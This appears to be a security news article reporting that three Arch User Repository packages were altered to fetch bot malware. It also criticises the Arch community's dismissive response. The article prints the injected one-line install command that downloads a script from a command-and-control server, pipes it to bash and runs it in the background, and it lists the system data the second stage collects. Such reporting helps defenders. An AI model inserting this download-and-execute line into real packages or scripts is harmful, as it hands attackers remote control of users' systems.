Another Linux distro poisoned with malware
Last time it was Gentoo, a hard-core, source-based Linux distribution that is popular with techies who like to spend hours tweaking their entire operating sytem and rebuilding all their software from scratch.
That sort of thing is not for everyone, but it is harmless fun and it does give you loads of insight into how everything fits together.
That sets it apart from distros such as ElementaryOS and Mint, which rival and even exceed Windows and macOS for ease of installation and use, but do not leave you with much of a sense of how it all actually works.
This time, the malware poisoning happened to Arch Linux, another distro we would characterise as hard-core, though very much more widely used than Gentoo.
Three downloadable software packages in the Arch User Respository were found to have been rebuilt so they contained what you might refer to as zombie malware.
Bots or zombies are malware programs that call home to fetch instructions from the crooks on what to do next.
The hacked packages were: acroread 9.5.5-8, balz 1.20-3 and minergate 8.1-2; they have all apparently been restored to their pre-infection state.
Simply put, the packages had one line added – on Linux, the core functionality of a bot can be trivially condensed into a single line:
curl -s https://[redacted]/~x|bash -&
This single line of code, part of an installation script written in Bash, fetches a text file from a command-and-control (C&C) server and runs it as a script in its own right.
This means that the attacker can change the behaviour of the malware at any time by altering the commands stored in the file ~x on the C&C server.
At present, the ~x command sets up a regular background task- the Linux equivalent of a Windows service – that repeatedly runs a second script called u.sh that is downloaded from the web page ~u on the same C&C server.
The u.sh file tries to extract some basic data about the infected system and upload it to a Pastebin account.
The system data that the u.sh malware is interested in comes from the following Arch commands:
echo ${MACHINE_ID} – the computers unique ID (randomly generated at install time) date +%s – the current date and time uname -a – details about the Linux version that is loaded id – details about the user account running the script lscpu – technical details about the system processor chip pacman -Qeq – the software you have installed pacman -Qdq – any extra software needed to go with it systemctl list-units – all the system services
Fortunately, the part of the script that does the data exfiltration contains a programming error, so the upload never happens.
Arch is well-respected for the enormous quantity of community documentation it has published in recent years – users of many other distros often find themselves referring to Arch Linux documentation pages to learn what they need to know.
Where Arch has been a little less likable, is the extent to which the distros culture mirrors the aggressive alpha techiness of the King of Linux, Linus Torvalds himself – a man who is on record for numerous intolerant, insulting and frequently purposeless outbursts aimed at those he thinks are in the way.
So we were not entirely surprised to see this online response from one of the luminati of the Arch community, dismissing the malware with a petulant meh:
This would be a warning for what exactly? That orphaned packages can be adopted by anyone? That we have a big bold disclaimer on the front page of the AUR clearly stating that you should use any content at your own risk? This thread is attracting way more attention than warranted. I am surprised that this type of silly package takeover and malware introduction does not happen more often……
To be fair to the Arch team, the hacked packages were found on AUR, which is the Arch User Repository, which is not vouched for or vetted by the Arch maintainers – in the same sort of way that none of the off-market Android forums are vouched for by Google.
Nevertheless, the AUR site is logoed up and branded as the Arch User Repository, not merely the User Repository, so a bit less attitude from the Arch team would not hurt.